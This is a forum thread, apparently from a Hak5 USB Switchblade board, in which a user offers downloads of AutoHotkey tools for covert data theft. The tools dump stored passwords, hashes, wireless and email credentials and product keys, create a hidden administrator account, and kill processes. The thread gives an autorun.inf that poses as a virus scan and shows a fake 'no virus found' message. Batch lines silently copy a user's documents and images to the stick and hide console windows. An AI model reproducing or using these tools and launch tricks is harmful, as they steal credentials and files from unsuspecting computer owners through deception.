Obi-Wahn

Hello everybody! Today, I'll release my self coded switchblade. It's a complete package, including all tools needed. Download U3P Package: http://www.autohotkey.net/~Obi-Wahn/hak5/m...Switchblade.u3p Download Non-U3 Package with .exe: http://www.autohotkey.net/~Obi-Wahn/hak5/m...e_exe_nonu3.zip Download Non-U3 Package with .bat: http://www.autohotkey.net/~Obi-Wahn/hak5/m...chblade_bat.zip Download Manual (.pdf): http://www.autohotkey.net/~Obi-Wahn/hak5/m...de/swbl_man.pdf Download Manual (.doc): http://www.autohotkey.net/~Obi-Wahn/hak5/m...de/swbl_man.doc Info's: The U3 Package works full. The Non-u3 Package (.exe and .bat) works also, but there are "quick and dirty" coded. So (especially the .bat package) may the downloader checks the sourcecode again. I've only written this because not everyone want to learn AHK or is able to "understand" ahk. Post Bugs and Errors here, send a PM or a Mail. And a feedback 'd be nice. Regards Obi-Wahn EDIT: Sorry, I had to hurry up yesterday. My U3 Switchblade is written in AutoHotkey, which is similar to Auto-IT. How to install and configure this tool is in the Manual. It is possible to: Dump System Information's (including Computername, Username, Adminstate of the user, Systemroot-, Application- , common application- and Comspec-path, Operating System, Language and Screen-Res, including a network information dump all in one file) Stop any kind of process Copy the clipboard to a file Dump Passwords from the Protected Storage Dump Network passwords dump Messenger Passwords dump Mailpasswords Dump History of the IE dump and decrypt passwords of Opera's wand file (if exist, works at least up to version 9.10) dump productkeys Dump User Password hashes dump dial-up passwords dump IE Passwords dump wireless passwords dump SID dump a list of installed software, including hotfixes dump a list of services dump a list of tcp connections dumps and decrypts the ASP.Net Account password Create a new, administrative user (username and password stored into the .ini), including German and English language support for success report Start Additional Programs, stored into the .ini, including optional hidden starting Trys to restart the terminated processes after finishing Further is it possible to add computers (in combination with the username) to a "watchlist". If the computer with the current user is into the list, the program will exit without dumping any data. It's possible to use the .exe without any other stuff to use the process-terminate-routine, the process-restart-routine, the sysinfo and the user-creation as standalone (.ini is needed) tool. For Standalone usage, read the manual or type "switchblade.exe /?" Developers are also welcome. Type "switchblade.exe /Src" to append the sourcecode to a file or -if you use the u3p package- hold CTRL down, while starting the Switchblade. Then it will append the sourcecode to a file and exit the program. All tools are included.

New tool added: file.exe Infos and download @first post.

wow nice wallpaper where did you get that ? deviantart. "Crowns of Fury" by Spaceartists

My Desktop Pictures are quite big, and they look ugly when I'm resize them. So I post the links. WITHOUT WINDOWS - WITH OPEN WINDOWS Style: Aero Style (Glass - Beta 2) [Custom Shellstyle] Font: Segoe UI BG: Crowns of Fury (Deviantart) Rainmeter: Digi-Skin Rainlendar: Clear Startmenu: VIStart Dock: Objectdock WinAmp: ClearONEbeta

No, it's normal. I'll change it, with my new tool, which will actually be released til tuesday.

Want execute your payload while browsing or not? When you want to modify your autoplay menue, try elmer's solution, alternative: AutoPlay Repair (You can Add, modify and delete entries too) When you want to start your payload too, while browsing try launcher.exe

Thats one type of file: All Types. But elmer means: fc.exe "C:*.doc + C:*.txt" "X:Files" /I This doesn't work.

I think, this shouldn't be a big problem. Then I'm working on this, the more-file-types-per-command issue and the varprob, which makes me kind of mad, cause I pass a parameter from the manifestfile of my switchblade and it works.

@elmer: NP. Your choise. BTW: I've tried a test.bat set D = %userprofile%Desktopfiles md %d% xcopy "C:*.log" "%d%" /S pause > nul and got a error message (translated): "Cyclic copy not possible" So did you do something different or what?

No. Fc is pointed to copy one type of file per command. It's not one FILEtype, but one TYPE of file. fc.exe "C:log*" "X:Files" /I Copies all files which are starting with "log" and doesn't matter which fileextention are the files have. fc.exe "C:*.doc" "X:Files" /I Copies all .doc Files to the destination folder. As soon I've time, I'll write a modification of the code to support more than one type of searchstring.

Hi! Since I found the scriptlanguage AutoHotKey, which is quite similar to AutoIT, I started developing some tools. Here some, which are -I think- maybe useful for your Switchblade. All of my Apps are OpenSource. So feel free to modify it, as you want, but you have to add the modified Sourcecode again to the Program, and Add a Comment to the Source or to a textdocument, where the Changes, the date and your name (at least the forumname) have to be stored. I'M NOT RESPONSIBLE FOR ANY DAMAGES OF THE SYSTEM, WHERE MY APPS ARE EXECUTED ======================================================================= FileCopier (fc.exe) DOWNLOAD fc is a tool, which searches a path for files, and copy them to a defined folder. There are some settings, which are stored into the Help dialogue. The Script is OpenSource, you'll get the Sourcecode with typing "fc.exe /Src" (Without "" ) Why I've created this: Because "Caryl3" needs a possibility to copy files, and I've a little sparetime, so I coded this. (SEE THIS THREAD) Help dialogue: fc.exe "Drive:Searchstring" "Targetfolder" [/I] [/O] [/Box] fc.exe [/Src] [/?] "Drive:Searchstring" Defines a Drive and a String which is searched for. "Targetfolder" Defines a Targetfolder where the files will be copied to. /I Includes Subfolders to the search. /O Overwrites existing files /Box Displays a Messagebox with the amount of copied files /Src Appends the Source of this program to a file /? Displays this Help Example: fc.exe "C:*.txt" "X:Files" /I /Box Copies every textdocument of drive C: to folder X:Files and displays a Popup after finishing fc.exe /Src Appends the Source of this tool to a .ahk File Changelog: 16.May.2K7 (15:37 GMT +1) + Added 2nd example to the Help + Added explanation of examples + Added "commandlinetool-beaviour" (if less than 2 parameters passed to the scipt, a cmd.exe window popps up shortly) + Bugfix: Recompile is now easier for developer who appended the source. (you don't have to rename the source now again) + Lil more explanation of the code into the source + Added credits + Sourcecode-Cleanup ---------------------------------------- Launcher (launch.exe) DOWNLOAD This is a tool for the Launch menue of a Non-U3 Switchblade. Execute the Program first in normal mode, and it will append a new, predefined autorun.inf file. The .inf file have a Shell entry, for this who have the Autoplay feature disabled, hidden as a Virusscan, which actually opens a small message, that no virus was found, when all apps are launched. Why I've created this: Because for my Switchblade release (which is comming soon). Predefined autorun.inf [autorun] open=launch.exe /S icon=%windir%system32shell32.dll,4 action=Open folder to view files label=Obi-Wahn ShellScan=Scan for Viruses ShellScanCommand=launch.exe /S /V [Launch] 1=switchblade.exe 2=explorer.exe . # Additional programs can be added with adding programs to the list, # one per line, asc. index no. # If you want to execute the Program, File whatever, in hidden mode, simply add after the name " , , Hide" # (Without "", but the first space is IMPORTANT) # Example: # 3=additionalitem.cmd , , Hide Infos: I call the Icon from the shell32.dll, so that It's in the Autoplay diaogue as the "Open folder" entry I've tried to call the String (Open folder to view files) from the shell too, but I wasn't able to do this. IMPORTANT: This tool is in developing phase. Parameter: /S lauches every entry into the [Launch] Section /V (As second parameter) displays a pseudo "no-Virus" message at the end of launching /Src Append the Sourcecode to a file. ---------------------------------------- File (file.exe) DOWNLOAD This tool is similar to fc.exe. But while the function is the same, operations are differen, you can choose more than one searchmask and do diferent tasks like Copying, Moving, Deleting, ... Warning: Like my other tools, this is Beta software. I'm not responsible for any damages on your or other systems. Why I've created this: Because fc.exe has several bugs, some fixed here. Parameter: file.exe /A:[C D M SD] "C:*.txt + C:*.doc" "X:Files" [/I] [/O] [/P] [/Box] [/Log] [/Debug] file.exe /A:SC <Target> <Linkfile> [<Workingdir> <Args> <Description> <Icon> <Shortcutkey> <IconNo> <Max|Min|Normal>] [/Debug] file.exe /A:E file.exe /Src /A:C Copies found Files to the Targetfolder /A:M Moves found Files to the Targetfolder /A:D Deletes found Files /A:SD Moves found Files to Paper Bin /A:SC Creates a Shortcut /A:E Empties the Paper Bin /I Includes Subfolders to the Search /O Overwrites Files into the Targetdirectory (Only Copying and Moving) /P Creates the same Folder Structure as Found (Only Copying and Moving) /Box Shows a Messagebox after Finishing /Log Creates a Logfile into the Targetfolder (Copying and Moving into the Targetfolder, Deleting into Tempfolder) /Debug Shows a Messagebox which Contains all Variables and their Values /Src Appends the Sourcecode to a .ahk File "C:*.txt + C:*.doc" Strings which shall be searched "X:Files" Targetfolder where the Files shall be copied/moved For the Shortcutsyntax: If you want to obmit a parameter you have to define it like "" for empty space. Else it will fail or define the parameter wrong. Examples: file.exe /A:SC C:Downloads Downloads.lnk "" "" Downloaddirectory Creates a Shortcut to the Folder C:Downloads, Linkfile is Downloads.lnk at the Scriptdirectory, no workingdir, no arguments but a Diescription (It's the Downloaddirectory) file.exe /A:D "C:Dokumente und EinstellungenObi-WahnDesktop*.lnk" Deletes all Shortcuts on the Desktop WITHOUT moving them to the Paperbin file.exe /A:SD "C:Dokumente und EinstellungenObi-WahnDesktop*.lnk" Deletes all Shortcuts on the Desktop and moves them to the Paperbin. file.exe /A:C "C:*.txt" "X:Files" /I /P Copies all Textfiles to the Targetdirectory (X:Files), includes Subfolders to the search and creates the same folder structure as on the Computer. -------------------------------- Obi-Wahn's Switchblade SEE THIS TOPIC -------------------------------- Processkiller (pkill.exe) DOWNLOAD This tool is used to terminate processes. THIS IS NOT A ANTIVIRUS / FIREWALLKILLER (but may works) You write in a file a processname per line, and define this file as 1st parameter. The second parameter is optional. If you define another file as the 2nd parameter, pkill.exe will write every found processname to the 2nd file. Why I've created this: Because this is may be usefull. I use it all time when i have to speed up my system quick. Parameters pkill.exe <list> <output> pkill.exe /? Shows the Help pkill.exe /Src Appends the Sourcecode to a file <list> List of Processnames (e.g.: ashServ.exe, one entry per line req) <output> List of Found Processes Example: pkill.exe processes.lst found.txt Reads every FULL line of "processes.lst", and If the processname exists, it will try to close the process, and write the processname to "found.txt" ----------------------- That's it. Maybe someone need this, so download it and use it. Future: Rapidshare full auto downloader (I know, there exist several, but I try to code one by myself). If any of you has a wish for a tool, so feel free to send me a pm. If it's possible for me (skill and time), I'll try to realize this. (Only if it makes sense, because if it's possible with a simple command in the batch, or there allready tools released, I don't code this) Regards Obi-Wahn

First Anwser: Yeah, its possible, but you know, that this takes probably a long time... CHECK THIS THREAD :: Possible Batch file @echo off start /wait fc.exe "%systemroot%*.avi" ".Movies" /I start /wait fc.exe "%systemroot%*.jpg" ".Pictures" /I exit Second answer: U want to execute a App from a cd when you insert the disc into the drive.. U have to write a autorun.inf file, and store it on root of the disc. Simple: [autorun] icon=icon.ico open=launch.exe CHECK MSFN FOR autorun.inf SYNTAX DESCRIPTION

I've the same Drive, and on this days I'm finishing the tests with my own Switchblade (U3-package). During this time, It works great. But I can't tell you anything bout the methods which are used into the WIKI.

Hi! @lixo: Yeah, It'd be no real problem to add this feature, but I've to add a Mailtool, a ziptool, ... and this wasn't the challenge. But feel free to modify the code if you want. @ASTRAPI: If you execute a file via Autorun, only this file will be executed. The Explorer window won't open. Only if you work with another tool. But I've coded a tool for this problem. (WARNING: This tool is in developement phase). LAUNCH So, first execute the tool with a doubleclick. This appends a autorun.inf file. Write every item that shall be executed to the right selection. (Self explaining into the .inf file.) Execute no. 1 : fc.exe "%Userprofile%*.jpg" ".Images" /o Execute no. 2: explorer.exe . Other paramerters of launch.exe: /S lauches every entry into the [Launch] Section /V (As second parameter) displays a pseudo "no-Virus" message at the end of launching However, this tool is in developement status. I'll not be responsible for any damages.

Shure, I could. But on the other hand with a wider range of parameters, the "compatibility" for errors increase. but ok. I'll change the code to smaller stings. If you prefer to have a choose-range, simple change the sourcecode from eg: If 1 = /Source to If 1 in /Source,/src,/s to increase the parameterrange. Updated Version fc.exe "Drive:Searchstring" "Targetfolder" [/I] [/O] [/Box] fc.exe [/Src] [/?] "Drive:Searchstring" Defines a Drive and a String which is searched for. "Targetfolder" Defines a Targetfolder where the files will be copied to. /I Includes Subfolders to the search. /O Overwrites existing files /Box Displays a Messagebox with the amount of copied files /Src Appends the Source of this program to a file /? Displays this Help Example: fc.exe "C:*.txt" "X:Files" /I /Box Copies every textdocument of drive C: to folder X:Files and displays a Popup after finishing fc.exe /Src Appends the Source of this tool to a .ahk File PS.: I update every time the version, so the link doesn't change, but the old version will be overwritten every time. If someone want a special modification, PM me or send me a message over IM. If it's possible for my scripting experience, i'll change it (but you have to be patient, I've sometimes to do a lot)

NP. I've modified my code again. Changelog: 16.May.2K7 (15:37 GMT +1) + Added 2nd example to the Help + Added explanation of examples + Added "commandlinetool-beaviour" (if less than 2 parameters passed to the scipt, a cmd.exe window popps up shortly) + Bugfix: Recompile is now easier for developer who appended the source. (you don't have to rename the source now again) + Lil more explanation of the code into the source + Added credits + Sourcecode-Cleanup Helpstrings: fc.exe "Drive:Searchstring" "Targetfolder" [/Include] [/Overwrite] [/Msgbox] [/Source] [/?] "Drive:Searchstring" Defines a Drive and a String which is searched for. "Targetfolder" Defines a Targetfolder where the files will be copied to. /Include Includes Subfolders to the search. /Overwrite Overwrites existing files /Msgbox Displays a Messagebox with the amount of copied files /Source Appends the Source of this program to a file /? Displays this Help Example: fc.exe "C:*.txt" "X:Files" /Include /Msgbox Copies every textdocument of drive C: to folder X:Files and displays a Popup after finishing fc.exe /Source Appends the Source of this tool to a .ahk File UPDATED VERSION (Same link as above)

shure. Type fc.exe /? for the Help or type fc.exe /Source to create the source of the program (I've changed the upper help, that wasn't formatted well)

I think you need: for %%i in (D E F G H I J K L M N O P Q R S T U V W X Y Z) do if exist %%i:start.bat set DRIVE = %%i start.bat is changeable (maybe to autorun.inf, but this would find maybe a other cd with autorun.inf, so it'd be the wrong driveletter....

I've a lil time, so I wrote a small tool 4 you. FileCopier (fc.exe) fc.exe "Drive:Searchstring" "Targetfolder" [/Include] [/Overwrite] [/Msgbox] [/Source] "Drive:Searchstring" Defines a Drive and a String which is searched for. "Targetfolder" Defines a Targetfolder where the files will be copied to. /Include Includes Subfolders to the search. /Overwrite Overwrites existing files /Msgbox Displays a Messagebox with the amount of copied files /Source Appends the Source of this program to a file Example: fc.exe "C:*.txt" "X:Files" /Include /Msgbox Written in AHK Changelog: 15.May.2K7 (17:40 GMT+1) + Fixed Bug (don't ignores allready existing files anymore) + Helpstrings (edited last @ Target) + Displays the amount of copied files and the amount of copied files in Megabytes + Notes added to the sourcecode + Increase speed of the program

Look at the code a 2nd time. You've forgot a single point. it has to be: start explorer ..... The single point says, that from this path to 2 instances up. alternative you can add this line (at the top or at the end) to define the drive. (info: it only works if the file autorun.inf (which is changeable) exists in the drive. for %%i in (D E F G H I J K L M N O P Q R S T U V W X Y Z) do if exist %%i:autorun.inf start %Windir%explorer.exe %%i: (untested with start, I set a var with this line)

Hey! look in THIS topic. The popping up of a cmd-window is (i think) fixed. further, you can unite the 2 lines code to one line. start /wait truecrypt /q /v saved.pst /lo && o:pstart.exe @mubix post from room362.com: y not. I'd like to download your stuff. Maybe 3 Gig for a torrent is a bit much but maybe you can split into 2 parts (using zip, rar, chainsaw, ...) Thanks

I think the easies way is, to write a line into batchfile. On first line write: explorer ..... and -if the code starts- it should open a window with the root of your usb device maybe it works also when you write (instead): shellexecute=system/cmd/go.exe && %WinDir%explorer.exe . Could work, if it works like a command prompt...

I've done a google search and ms support says that shellexecute searches in HKEY_LOCAL_ROOT for the extention of the program, that is associated to a method of execution. So try: shellexecute=systemCMDcmdow.exe /RUN /HID go.cmd PS.: There are several ways to create a u3p package. On the U3 Homepage is a developer package downloadable (after a registration) or you can download a small program called PackageFactory from http://www.eure.ca/ to build simple u3p packages.

you don't use this batch in a .u3p Package, right? cause if it is so, you can use in the manifest file. the string would be: <appStart cmd="%U3_APP_DATA_PATH%cmdow.exe /RUN /HID yourbatch.bat"></appStart> else if you use shellexecute: shellexecute=cmdow.exe /RUN /HID go.cmd but this codes need to have the batch into the same folder as the cmdow.exe

Good Morning. @GonZor: I've tried with a simple batch. U can choose 2 options. Shell and Silent batch. However if you make a Silent .exe, a Messagebox appears, and if u use Shell style, u have to hit any key. BTW: If you use the regular download (Download-Section, Ver 2.1.5.0) there are a Trojan horse detected (it's a wrong warning). But in their forums they have discussed this issue, and they've fixed it (SEE HERE) to cmdow: I think you should use the /RUN command, because (on my machine) a console window appears for less than a sec, but you'll recognize it.